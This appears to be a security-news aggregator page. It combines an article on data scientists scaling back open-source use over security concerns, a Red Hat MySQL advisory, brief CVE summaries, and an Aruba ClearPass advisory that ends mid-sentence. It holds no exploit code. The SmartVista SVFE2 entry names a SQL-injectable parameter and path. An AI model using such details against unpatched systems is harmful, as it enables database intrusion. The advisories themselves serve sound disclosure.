Data scientists, who often choose open source packages without considering security, increasingly face concerns over the unvetted use of those components, new study shows.

Vulnerabilities in open source components — such as the widespread flaws revealed 10 months ago in Log4j 2.0 — have forced data scientists to reevaluate the open source code frequently used in analysis and the creation of machine learning models.

According to a report by Anaconda, a data-science platform firm, in the past year, 40% of surveyed data scientists, business analysts, and students have scaled back their use of open source components, while a third remained steady, and only 7% incorporated more open source code into their projects. The majority of those surveyed do not report to the information technology department (18%), but work within their own data science or research and development group (47%), according to Anaconda's "2022 State of Data Science" report, released last week.

While software developers and IT have already started vetting secure code, the concerns over the security in open source software is a relatively new trend for the data science world, says Peter Wang, co-founder and CEO of Anaconda.

"We see a tremendous portion of people who are at organizations where IT has created a very strict posture around open source and Python," he says. "These are not expert developers. ... They are data scientists and machine learning people who may not be very seasoned developers at all, using whatever they could download to do their analysis, and then they handed that over that to IT."

The security of open source components — and the software supply chain, in general — has become a primary consideration among software developers, businesses, and national governments over the past two years. In May, for example, the US National Institute of Standards and Technology (NIST) issued guidance for address software supply chain risks. In addition, a growing number of software vendors have joined with the Linux Foundation's Open Software Security Foundation (OpenSSF).

    

While many data science teams scan open source components for vulnerabilities, many create their own software instead. Source: Anaconda's "2022 State of Data Science" report.

Overall, the maturity of organizations' security efforts has improved. About half of firms have an open source security policy in place, which leads to better performance in measures of security readiness, according to the June survey. In addition, the efforts to control open source risk has jumped by 51% in the past 12 months, a study of security maturity stated on Sept. 21.

"\[W\]ith the attention placed on software supply chains, most enterprise organizations are taking a risk-based approach to application security," Jason Schmitt, general manager of the Synopsys Software Integrity Group, said in a statement announcing the study. "Such an approach recognizes that security isn't limited to the codebase; it includes the process of software development where security reviews and testing 'shift everywhere' to continuously improve security outcomes."

**Devs Expand Use of Open Source **

Software companies are not seeing any sort of decrease in open source usage, according to other data. Instead, development organizations are focusing on improving the security of open source software and using security as a primary guide in selecting components.

In the "2021 State of the Software Supply Chain" report, for example, Sonatype found that the top four open source ecosystems — the Maven Central Repository (Java), Node.js (JavaScript), the Python Package Index (Python), and the NuGet gallery (.NET) — housed 37 million open source projects and components, an increase of 20% year-over-year. The demand for those components is likewise increasing: More than 2.2 trillion components were downloaded, a 73% annual increase.

A self-reported move away from open source packages by the data science community is likely indicative of greater awareness of security issues and less about jettisoning open source components in development, says Tracy Miranda, head of open source at Chainguard.

While data science teams and development teams may have reacted differently to major security issues — such as Log4j 2.0 — companies have little recourse when moving away from one open source package than to adopt a different package whose maintainers have put a greater emphasis on security, she says.

"Companies leverage open source as a way to increase their velocity so if they are scaling back, what are they scaling back to? Writing code in-house? Using third-party versions packaged up?" Miranda says, adding that instead, "I do think we can expect to see companies be more discerning about the quality of the open source they use, especially related to security features."

**Data Scientists Are Playing Catch-up**

The disconnect between the two sides is likely due to the different audiences in the various surveys. Anaconda's survey focused on data science professionals, as can be seen from their respondent's choice of programming languages — 58% used Python and 42% used SQL, while only 26% used JavaScript. 

A better measure of software developer sentiments is StackOverflow's "2022 Developer Survey," which found that while 58% of 'people learning to code' use Python, only 44% of professional developers code in that language. On the other hand, 68% of professional developers use JavaScript, according to StackOverflow's survey.

In addition, while data science professional work at companies that overwhelmingly (87%) allow open-source software, about a quarter (26%) have minimal oversight by the IT department of their open source choices, the Anaconda report stated. In another 18% of companies, the IT department only specifies about half of the available open source components.

The maintainers of the most critical projects — of which there are hundreds, if not thousands — need to use secure dependencies, test their own code, and validate the trustworthiness of contributors. The maintainers should also publish a security scorecard — a Google-created initiative now managed by the Open Source Security Foundation (OpenSSF), which gives a security grade to a project based on nearly 20 different criteria.

While awareness is likely increasing, there is no quick solution, Miranda says.

"The reality is that the more secure options have not previously existed," she says. "Trimming unnecessary dependencies to reduce attack surface is sensible, but it's hard to do once the dependency tree has grown large."

Data Scientists Dial Back Use of Open Source Code Due to Security Worries

Red Hat Security Advisory 2022-6590-01 - MySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon and many client programs and libraries.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: mysql security, bug fix, and enhancement update  
Advisory ID:       RHSA-2022:6590-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6590  
Issue date:        2022-09-20  
CVE Names:         CVE-2022-21412 CVE-2022-21413 CVE-2022-21414  
                   CVE-2022-21415 CVE-2022-21417 CVE-2022-21418  
                   CVE-2022-21423 CVE-2022-21425 CVE-2022-21427  
                   CVE-2022-21435 CVE-2022-21436 CVE-2022-21437  
                   CVE-2022-21438 CVE-2022-21440 CVE-2022-21444  
                   CVE-2022-21451 CVE-2022-21452 CVE-2022-21454  
                   CVE-2022-21455 CVE-2022-21457 CVE-2022-21459  
                   CVE-2022-21460 CVE-2022-21462 CVE-2022-21478  
                   CVE-2022-21479 CVE-2022-21509 CVE-2022-21515  
                   CVE-2022-21517 CVE-2022-21522 CVE-2022-21525  
                   CVE-2022-21526 CVE-2022-21527 CVE-2022-21528  
                   CVE-2022-21529 CVE-2022-21530 CVE-2022-21531  
                   CVE-2022-21534 CVE-2022-21537 CVE-2022-21538  
                   CVE-2022-21539 CVE-2022-21547 CVE-2022-21553  
                   CVE-2022-21556 CVE-2022-21569  
====================================================================  
1. Summary:

An update for mysql is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

MySQL is a multi-user, multi-threaded SQL database server. It consists of  
the MySQL server daemon (mysqld) and many client programs and libraries.

The following packages have been upgraded to a later upstream version:  
mysql (8.0.30). (BZ#2122589)

Security Fix(es):

* mysql: Server: Optimizer multiple unspecified vulnerabilities (CPU Apr  
2022) (CVE-2022-21412, CVE-2022-21414, CVE-2022-21435, CVE-2022-21436,  
CVE-2022-21437, CVE-2022-21438, CVE-2022-21440, CVE-2022-21452,  
CVE-2022-21459, CVE-2022-21462, CVE-2022-21478, CVE-2022-21479)

* mysql: Server: DML unspecified vulnerability (CPU Apr 2022)  
(CVE-2022-21413)

* mysql: Server: Replication unspecified vulnerability (CPU Apr 2022)  
(CVE-2022-21415)

* mysql: InnoDB multiple unspecified vulnerabilities (CPU Apr 2022)  
(CVE-2022-21417, CVE-2022-21418, CVE-2022-21451, CVE-2022-21423)

* mysql: Server: DDL multiple unspecified vulnerabilities (CPU Apr 2022)  
(CVE-2022-21425, CVE-2022-21444)

* mysql: Server: FTS unspecified vulnerability (CPU Apr 2022)  
(CVE-2022-21427)

* mysql: Server: Group Replication Plugin unspecified vulnerability (CPU  
Apr 2022) (CVE-2022-21454)

* mysql: Server: PAM Auth Plugin unspecified vulnerability (CPU Jul 2022)  
(CVE-2022-21455)

* mysql: Server: PAM Auth Plugin unspecified vulnerability (CPU Apr 2022)  
(CVE-2022-21457)

* mysql: Server: Logging unspecified vulnerability (CPU Apr 2022)  
(CVE-2022-21460)

* mysql: Server: Optimizer multiple unspecified vulnerabilities (CPU Jul  
2022) (CVE-2022-21509, CVE-2022-21525, CVE-2022-21526, CVE-2022-21527,  
CVE-2022-21528, CVE-2022-21529, CVE-2022-21530, CVE-2022-21531,  
CVE-2022-21553, CVE-2022-21556, CVE-2022-21569)

* mysql: Server: Options unspecified vulnerability (CPU Jul 2022)  
(CVE-2022-21515)

* mysql: InnoDB multiple unspecified vulnerabilities (CPU Jul 2022)  
(CVE-2022-21517, CVE-2022-21537, CVE-2022-21539)

* mysql: Server: Stored Procedure multiple unspecified vulnerabilities (CPU  
Jul 2022) (CVE-2022-21522, CVE-2022-21534)

* mysql: Server: Federated unspecified vulnerability (CPU Jul 2022)  
(CVE-2022-21547)

* mysql: Server: Security: Encryption unspecified vulnerability (CPU Jul  
2022) (CVE-2022-21538)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Default logrotate set to wrong log file (BZ#2122592)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing this update, the MySQL server daemon (mysqld) will be  
restarted automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2082636 - CVE-2022-21412 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2022)  
2082637 - CVE-2022-21413 mysql: Server: DML unspecified vulnerability (CPU Apr 2022)  
2082638 - CVE-2022-21414 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2022)  
2082639 - CVE-2022-21415 mysql: Server: Replication unspecified vulnerability (CPU Apr 2022)  
2082640 - CVE-2022-21417 mysql: InnoDB unspecified vulnerability (CPU Apr 2022)  
2082641 - CVE-2022-21418 mysql: InnoDB unspecified vulnerability (CPU Apr 2022)  
2082642 - CVE-2022-21423 mysql: InnoDB unspecified vulnerability (CPU Apr 2022)  
2082643 - CVE-2022-21425 mysql: Server: DDL unspecified vulnerability (CPU Apr 2022)  
2082644 - CVE-2022-21427 mysql: Server: FTS unspecified vulnerability (CPU Apr 2022)  
2082645 - CVE-2022-21435 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2022)  
2082646 - CVE-2022-21436 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2022)  
2082647 - CVE-2022-21437 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2022)  
2082648 - CVE-2022-21438 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2022)  
2082649 - CVE-2022-21440 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2022)  
2082650 - CVE-2022-21444 mysql: Server: DDL unspecified vulnerability (CPU Apr 2022)  
2082651 - CVE-2022-21451 mysql: InnoDB unspecified vulnerability (CPU Apr 2022)  
2082652 - CVE-2022-21452 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2022)  
2082653 - CVE-2022-21454 mysql: Server: Group Replication Plugin unspecified vulnerability (CPU Apr 2022)  
2082654 - CVE-2022-21457 mysql: Server: PAM Auth Plugin unspecified vulnerability (CPU Apr 2022)  
2082655 - CVE-2022-21459 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2022)  
2082656 - CVE-2022-21460 mysql: Server: Logging unspecified vulnerability (CPU Apr 2022)  
2082657 - CVE-2022-21462 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2022)  
2082658 - CVE-2022-21478 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2022)  
2082659 - CVE-2022-21479 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2022)  
2115282 - CVE-2022-21455 mysql: Server: PAM Auth Plugin unspecified vulnerability (CPU Jul 2022)  
2115283 - CVE-2022-21509 mysql: Server: Optimizer unspecified vulnerability (CPU Jul 2022)  
2115284 - CVE-2022-21515 mysql: Server: Options unspecified vulnerability (CPU Jul 2022)  
2115285 - CVE-2022-21517 mysql: InnoDB unspecified vulnerability (CPU Jul 2022)  
2115286 - CVE-2022-21522 mysql: Server: Stored Procedure unspecified vulnerability (CPU Jul 2022)  
2115287 - CVE-2022-21525 mysql: Server: Optimizer unspecified vulnerability (CPU Jul 2022)  
2115288 - CVE-2022-21526 mysql: Server: Optimizer unspecified vulnerability (CPU Jul 2022)  
2115289 - CVE-2022-21527 mysql: Server: Optimizer unspecified vulnerability (CPU Jul 2022)  
2115290 - CVE-2022-21528 mysql: Server: Optimizer unspecified vulnerability (CPU Jul 2022)  
2115291 - CVE-2022-21529 mysql: Server: Optimizer unspecified vulnerability (CPU Jul 2022)  
2115292 - CVE-2022-21530 mysql: Server: Optimizer unspecified vulnerability (CPU Jul 2022)  
2115293 - CVE-2022-21531 mysql: Server: Optimizer unspecified vulnerability (CPU Jul 2022)  
2115294 - CVE-2022-21534 mysql: Server: Stored Procedure unspecified vulnerability (CPU Jul 2022)  
2115295 - CVE-2022-21537 mysql: InnoDB unspecified vulnerability (CPU Jul 2022)  
2115296 - CVE-2022-21538 mysql: Server: Security: Encryption unspecified vulnerability (CPU Jul 2022)  
2115297 - CVE-2022-21539 mysql: InnoDB unspecified vulnerability (CPU Jul 2022)  
2115298 - CVE-2022-21547 mysql: Server: Federated unspecified vulnerability (CPU Jul 2022)  
2115299 - CVE-2022-21553 mysql: Server: Optimizer unspecified vulnerability (CPU Jul 2022)  
2115300 - CVE-2022-21556 mysql: Server: Optimizer unspecified vulnerability (CPU Jul 2022)  
2115301 - CVE-2022-21569 mysql: Server: Optimizer unspecified vulnerability (CPU Jul 2022)  
2122589 - [Tracker] Rebase to MySQL 8.0.30 [rhel-9.0.0.z]  
2122592 - Default logrotate set to wrong log file [rhel-9.0.0.z]

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
mysql-8.0.30-3.el9_0.src.rpm

aarch64:  
mysql-8.0.30-3.el9_0.aarch64.rpm  
mysql-common-8.0.30-3.el9_0.aarch64.rpm  
mysql-debuginfo-8.0.30-3.el9_0.aarch64.rpm  
mysql-debugsource-8.0.30-3.el9_0.aarch64.rpm  
mysql-devel-debuginfo-8.0.30-3.el9_0.aarch64.rpm  
mysql-errmsg-8.0.30-3.el9_0.aarch64.rpm  
mysql-libs-debuginfo-8.0.30-3.el9_0.aarch64.rpm  
mysql-server-8.0.30-3.el9_0.aarch64.rpm  
mysql-server-debuginfo-8.0.30-3.el9_0.aarch64.rpm  
mysql-test-debuginfo-8.0.30-3.el9_0.aarch64.rpm

ppc64le:  
mysql-8.0.30-3.el9_0.ppc64le.rpm  
mysql-common-8.0.30-3.el9_0.ppc64le.rpm  
mysql-debuginfo-8.0.30-3.el9_0.ppc64le.rpm  
mysql-debugsource-8.0.30-3.el9_0.ppc64le.rpm  
mysql-devel-debuginfo-8.0.30-3.el9_0.ppc64le.rpm  
mysql-errmsg-8.0.30-3.el9_0.ppc64le.rpm  
mysql-libs-debuginfo-8.0.30-3.el9_0.ppc64le.rpm  
mysql-server-8.0.30-3.el9_0.ppc64le.rpm  
mysql-server-debuginfo-8.0.30-3.el9_0.ppc64le.rpm  
mysql-test-debuginfo-8.0.30-3.el9_0.ppc64le.rpm

s390x:  
mysql-8.0.30-3.el9_0.s390x.rpm  
mysql-common-8.0.30-3.el9_0.s390x.rpm  
mysql-debuginfo-8.0.30-3.el9_0.s390x.rpm  
mysql-debugsource-8.0.30-3.el9_0.s390x.rpm  
mysql-devel-debuginfo-8.0.30-3.el9_0.s390x.rpm  
mysql-errmsg-8.0.30-3.el9_0.s390x.rpm  
mysql-libs-debuginfo-8.0.30-3.el9_0.s390x.rpm  
mysql-server-8.0.30-3.el9_0.s390x.rpm  
mysql-server-debuginfo-8.0.30-3.el9_0.s390x.rpm  
mysql-test-debuginfo-8.0.30-3.el9_0.s390x.rpm

x86_64:  
mysql-8.0.30-3.el9_0.x86_64.rpm  
mysql-common-8.0.30-3.el9_0.x86_64.rpm  
mysql-debuginfo-8.0.30-3.el9_0.x86_64.rpm  
mysql-debugsource-8.0.30-3.el9_0.x86_64.rpm  
mysql-devel-debuginfo-8.0.30-3.el9_0.x86_64.rpm  
mysql-errmsg-8.0.30-3.el9_0.x86_64.rpm  
mysql-libs-debuginfo-8.0.30-3.el9_0.x86_64.rpm  
mysql-server-8.0.30-3.el9_0.x86_64.rpm  
mysql-server-debuginfo-8.0.30-3.el9_0.x86_64.rpm  
mysql-test-debuginfo-8.0.30-3.el9_0.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 9):

aarch64:  
mysql-debuginfo-8.0.30-3.el9_0.aarch64.rpm  
mysql-debugsource-8.0.30-3.el9_0.aarch64.rpm  
mysql-devel-8.0.30-3.el9_0.aarch64.rpm  
mysql-devel-debuginfo-8.0.30-3.el9_0.aarch64.rpm  
mysql-libs-8.0.30-3.el9_0.aarch64.rpm  
mysql-libs-debuginfo-8.0.30-3.el9_0.aarch64.rpm  
mysql-server-debuginfo-8.0.30-3.el9_0.aarch64.rpm  
mysql-test-8.0.30-3.el9_0.aarch64.rpm  
mysql-test-debuginfo-8.0.30-3.el9_0.aarch64.rpm

ppc64le:  
mysql-debuginfo-8.0.30-3.el9_0.ppc64le.rpm  
mysql-debugsource-8.0.30-3.el9_0.ppc64le.rpm  
mysql-devel-8.0.30-3.el9_0.ppc64le.rpm  
mysql-devel-debuginfo-8.0.30-3.el9_0.ppc64le.rpm  
mysql-libs-8.0.30-3.el9_0.ppc64le.rpm  
mysql-libs-debuginfo-8.0.30-3.el9_0.ppc64le.rpm  
mysql-server-debuginfo-8.0.30-3.el9_0.ppc64le.rpm  
mysql-test-8.0.30-3.el9_0.ppc64le.rpm  
mysql-test-debuginfo-8.0.30-3.el9_0.ppc64le.rpm

s390x:  
mysql-debuginfo-8.0.30-3.el9_0.s390x.rpm  
mysql-debugsource-8.0.30-3.el9_0.s390x.rpm  
mysql-devel-8.0.30-3.el9_0.s390x.rpm  
mysql-devel-debuginfo-8.0.30-3.el9_0.s390x.rpm  
mysql-libs-8.0.30-3.el9_0.s390x.rpm  
mysql-libs-debuginfo-8.0.30-3.el9_0.s390x.rpm  
mysql-server-debuginfo-8.0.30-3.el9_0.s390x.rpm  
mysql-test-8.0.30-3.el9_0.s390x.rpm  
mysql-test-debuginfo-8.0.30-3.el9_0.s390x.rpm

x86_64:  
mysql-debuginfo-8.0.30-3.el9_0.x86_64.rpm  
mysql-debugsource-8.0.30-3.el9_0.x86_64.rpm  
mysql-devel-8.0.30-3.el9_0.x86_64.rpm  
mysql-devel-debuginfo-8.0.30-3.el9_0.x86_64.rpm  
mysql-libs-8.0.30-3.el9_0.x86_64.rpm  
mysql-libs-debuginfo-8.0.30-3.el9_0.x86_64.rpm  
mysql-server-debuginfo-8.0.30-3.el9_0.x86_64.rpm  
mysql-test-8.0.30-3.el9_0.x86_64.rpm  
mysql-test-debuginfo-8.0.30-3.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-21412  
https://access.redhat.com/security/cve/CVE-2022-21413  
https://access.redhat.com/security/cve/CVE-2022-21414  
https://access.redhat.com/security/cve/CVE-2022-21415  
https://access.redhat.com/security/cve/CVE-2022-21417  
https://access.redhat.com/security/cve/CVE-2022-21418  
https://access.redhat.com/security/cve/CVE-2022-21423  
https://access.redhat.com/security/cve/CVE-2022-21425  
https://access.redhat.com/security/cve/CVE-2022-21427  
https://access.redhat.com/security/cve/CVE-2022-21435  
https://access.redhat.com/security/cve/CVE-2022-21436  
https://access.redhat.com/security/cve/CVE-2022-21437  
https://access.redhat.com/security/cve/CVE-2022-21438  
https://access.redhat.com/security/cve/CVE-2022-21440  
https://access.redhat.com/security/cve/CVE-2022-21444  
https://access.redhat.com/security/cve/CVE-2022-21451  
https://access.redhat.com/security/cve/CVE-2022-21452  
https://access.redhat.com/security/cve/CVE-2022-21454  
https://access.redhat.com/security/cve/CVE-2022-21455  
https://access.redhat.com/security/cve/CVE-2022-21457  
https://access.redhat.com/security/cve/CVE-2022-21459  
https://access.redhat.com/security/cve/CVE-2022-21460  
https://access.redhat.com/security/cve/CVE-2022-21462  
https://access.redhat.com/security/cve/CVE-2022-21478  
https://access.redhat.com/security/cve/CVE-2022-21479  
https://access.redhat.com/security/cve/CVE-2022-21509  
https://access.redhat.com/security/cve/CVE-2022-21515  
https://access.redhat.com/security/cve/CVE-2022-21517  
https://access.redhat.com/security/cve/CVE-2022-21522  
https://access.redhat.com/security/cve/CVE-2022-21525  
https://access.redhat.com/security/cve/CVE-2022-21526  
https://access.redhat.com/security/cve/CVE-2022-21527  
https://access.redhat.com/security/cve/CVE-2022-21528  
https://access.redhat.com/security/cve/CVE-2022-21529  
https://access.redhat.com/security/cve/CVE-2022-21530  
https://access.redhat.com/security/cve/CVE-2022-21531  
https://access.redhat.com/security/cve/CVE-2022-21534  
https://access.redhat.com/security/cve/CVE-2022-21537  
https://access.redhat.com/security/cve/CVE-2022-21538  
https://access.redhat.com/security/cve/CVE-2022-21539  
https://access.redhat.com/security/cve/CVE-2022-21547  
https://access.redhat.com/security/cve/CVE-2022-21553  
https://access.redhat.com/security/cve/CVE-2022-21556  
https://access.redhat.com/security/cve/CVE-2022-21569  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYypfs9zjgjWX9erEAQi29w/+IYQhWwETOzatTJhnrCzNRiXEOxbO6Jwe  
QfESim2Fkw3RG0d8SESKBSQ++cHYHPKHIvHBvTzsQRwDXTNRl/MXbRrhsTEEo1Ph  
JoLYIM3mi9kUgvzF+Hmbc+pUqsSoD189VpcJh/v9HQ77W9QsPuqGCgC4WEYeoMOe  
JDWA3CHRRosCKxJhRxmXMyuR5HyY2b08h7zKydFu2kcMHCEjfMtgKTYwrCKDFzHi  
HPTLyJyKYI3Kzj1msjQlRfmGvwY0Zu0Sp0O/Gt38C0kpZMKOjSsT9QSuLUUKDED0  
6bXpGW+LrF1FKnJy39mMmeEsKpcusWlIaveD+VlHsd+0ZE2FspoAZD+6NlIHMgDb  
S7cwLhkzRfdXsunveyzRYZFBhCRnAPYUqcTZuuXQb8HraLrdBOWPExH7maWy04F8  
gYZDGxrJBnxJK5YJzGufGDsm1A5N84SOmkgecZZtcW6p4ssCI8gTH59DdzFukpmR  
p57alaamiDccdEhFAnyh9yddpEllTTjQUHlT77zU661cKv57gjh+Op06/Y84uuDC  
t0rMCKUro/xINyMq5y+YoXSTQ0502PMNZIGrSs6HDnNv7F8bUfXwAG6KUhByA+lv  
vKYKtK4qTEV92vV6104ZboamOxdNNeIf/mQH4Gt8zwEId77RC0B0WXv01H1Ihc7C  
lJEKP7MBI4E=Z91l  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6590-01

The library automation system product KOHA developed by Parantez Teknoloji before version 19.05.03 has an unauthenticated SQL Injection vulnerability. This has been fixed in the version 19.05.03.01.



CVE-2022-0495

Database Software Accreditation Tracking/Presentation Module product before version 2 has an unauthenticated SQL Injection vulnerability. This is fixed in version 2.



CVE-2022-2315

SmartVista SVFE2 v2.2.22 was discovered to contain a SQL injection vulnerability via the UserForm:j_id90 parameter at /SVFE2/pages/feegroups/mcc_group.jsf.

An attacker requires an account on the SmartVista SVFE2. An attacker can use a quote character to break query string and inject sql payload to "UserForm:j\_id90" parameter in /SVFE2/pages/feegroups/mcc\_group.jsf. Response data could help an attacker identify whether an injected SQL query is correct or not.

CVE-2022-38619: SQL Injection in Terminal MCC Group feature of SmartVista SVFE2 version 2.2.22 (CVE-2022-38619)

In versions of Apache InLong prior to 1.3.0, an attacker with sufficient privileges to specify MySQL JDBC connection URL parameters and to write arbitrary data to the MySQL database, could cause this data to be deserialized by Apache InLong, potentially leading to Remote Code Execution on the Apache InLong server. Users are advised to upgrade to Apache InLong 1.3.0 or newer.

**Apache InLong vulnerable to Deserialization of Untrusted Data**

High severity GitHub Reviewed Published Sep 21, 2022 • Updated Sep 21, 2022

GHSA-26m4-qjp9-xmc6: Apache InLong vulnerable to Deserialization of Untrusted Data

A vulnerability exists in the ClearPass Policy Manager Guest User Interface that can allow an unauthenticated attacker to send specific operations which result in a Denial-of-Service condition. A successful exploitation of this vulnerability results in the unavailability of the guest interface in Aruba ClearPass Policy Manager version(s): 6.10.x: 6.10.6 and below; 6.9.x: 6.9.11 and below. Aruba has released upgrades for Aruba ClearPass Policy Manager that address this security vulnerability.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Aruba Product Security Advisory =============================== Advisory ID: ARUBA-PSA-2022-013 CVE: CVE-2022-23685, CVE-2022-23692, CVE-2022-23693, CVE-2022-23694, CVE-2022-23695, CVE-2022-23696, CVE-2022-37877, CVE-2022-37878, CVE-2022-37879, CVE-2022-37880, CVE-2022-37881, CVE-2022-37882, CVE-2022-37883, CVE-2022-37884 Publication Date: 2022-Sep-07 Status: Confirmed Severity: High Revision: 1 Title ===== ClearPass Policy Manager Multiple Vulnerabilities Overview ======== Aruba has released updates to ClearPass Policy Manager that address multiple security vulnerabilities. Affected Products ================= These vulnerabilities affect ClearPass Policy Manager running the following patch versions unless specifically noted otherwise in the details section: - ClearPass Policy Manager 6.10.x: 6.10.6 and below - ClearPass Policy Manager 6.9.x: 6.9.11 and below Updating ClearPass Policy Manager to a patch version listed in the Resolution section at the end of this advisory will resolve all issues in the details section. Versions of ClearPass Policy Manager that are end of life are affected by these vulnerabilities unless otherwise indicated. Impacted customers should plan to migrate to a supported version. Supported versions as of the release of this advisory are: - ClearPass Policy Manager 6.10.x - ClearPass Policy Manager 6.9.x Details ======= Authenticated SQL Injection Vulnerabilities in ClearPass Policy Manager Web-based Management Interface (CVE-2022-23692, CVE-2022-23693, CVE-2022-23694 CVE-2022-23695, CVE-2022-23696) --------------------------------------------------------------------- Vulnerabilities in the web-based management interface of ClearPass Policy Manager could allow an authenticated remote attacker to conduct SQL injection attacks against the ClearPass Policy Manager instance. An attacker could exploit these vulnerabilities to obtain and modify sensitive information in the underlying database potentially leading to complete compromise of the ClearPass Policy Manager cluster. Internal references: ATLCP-177, ATLCP-178, ATLCP-180 ATLCP-201, ATLCP-202 Severity: High CVSSv3 Overall Score: 8.8 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H Discovery: These vulnerabilities were discovered and reported by Luke Young (bugcrowd.com/bored-engineer) and Daniel Jensen (@dozernz) via Aruba's Bug Bounty Program Lack of Cross-Site Request Forgery (CSRF) Protections for some Endpoints in ClearPass Policy Manager (CVE-2022-23685) --------------------------------------------------------------------- A vulnerability in the ClearPass Policy Manager web-based management interface exists which exposes some endpoints to a lack of Cross-Site Request Forgery (CSRF) protection. This could allow a remote unauthenticated attacker to execute arbitrary input against these endpoints if the attacker can convince an authenticated user of the interface to interact with a specially crafted URL. Internal References: ATLCP-219 Severity: High CVSSv3.x Overall Score: 8.1 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N Discovery: This vulnerability was discovered and reported by the Aruba ClearPass Policy Manager Engineering Team. Local Privilege Escalation in ClearPass OnGuard macOS Agent (CVE-2022-37877) --------------------------------------------------------------------- A vulnerability in the ClearPass OnGuard macOS agent could allow malicious users on a macOS instance to elevate their user privileges. A successful exploit could allow these users to execute arbitrary code with root level privileges on the macOS instance. Internal references: ATLCP-205 Severity: High CVSSv3 Overall Score: 8.0 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L Discovery: This vulnerability was discovered and reported by Luke Young (bugcrowd.com/bored\_engineer) via Aruba's Bug Bounty Program. Authenticated Remote Command Injection in ClearPass Policy Manager Web-Based Management Interface (CVE-2022-37878, CVE-2022-37879, CVE-2022-37880, CVE-2022-37881, CVE-2022-37882, CVE-2022-37883) --------------------------------------------------------------------- Vulnerabilities in the ClearPass Policy Manager web-based management interface allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise. Internal References: ATLCP-166, ATLCP-179, ATLCP-183, ATLCP-189, ATLCP-193, ATLCP-197 Severity: High CVSSv3.x Overall Score: 7.2 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H Discovery: These vulnerabilities were discovered and reported by Daniel Jensen (@dozernz) via Aruba's Bug Bounty Program. Unauthenticated Denial-of-Service Condition in ClearPass Policy Manager Guest User Interface (CVE-2022-37884) -------------------------------------------------------------------- A vulnerability exists in the ClearPass Policy Manager Guest User Interface that can allow an unauthenticated attacker to send specific operations which result in a Denial-of-Service condition. A successful exploitation of this vulnerability results in the unavailability of the guest interface. Internal Reference: ATLCP-167 Severity: Medium CVSSv3.x Overall Score: 5.3 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L Discovery: This vulnerability was discovered and reported by Daniel Jensen (@dozernz) via Aruba's Bug Bounty Program. Resolution ========== The vulnerabilities contained in this advisory can be addressed by patching or upgrading to one of the ClearPass Policy Manager versions listed below - ClearPass Policy Manager 6.10.x: 6.10.7 and above - ClearPass Policy Manager 6.9.x: 6.9.12 and above Aruba does not evaluate or patch ClearPass Policy Manager versions that have reached their End of Support (EoS) milestone. For more information about Aruba's End of Support policy visit: https://www.arubanetworks.com/support-services/end-of-life/ Workaround ========== To minimize the likelihood of an attacker exploiting these vulnerabilities, Aruba recommends that the CLI and web-based management interfaces for ClearPass Policy Manager be restricted to a dedicated layer 2 segment/VLAN and/or controlled by firewall policies at layer 3 and above ClearPass Policy Manager Security Hardening =========================================== For general information on hardening ClearPass Policy Manager instances against security threats please see the ClearPass Policy Manager Hardening Guide available at https://support.hpe.com/hpesc/public/docDisplay?docId=a00091066en\_us for ClearPass Policy Manager 6.9.x and earlier versions. For ClearPass 6.10.x the ClearPass Policy Manager Hardening Guide is available at https://www.arubanetworks.com/techdocs/ClearPass/6.10/PolicyManager/Content/home.htm Exploitation and Public Discussion ================================== Aruba is not aware of any public discussion or exploit code that target these specific vulnerabilities as of the release date of the advisory. Revision History ================ Revision 1 / 2022-Sep-07 / Initial release Aruba SIRT Security Procedures ============================== Complete information on reporting security vulnerabilities in Aruba Networks products and obtaining assistance with 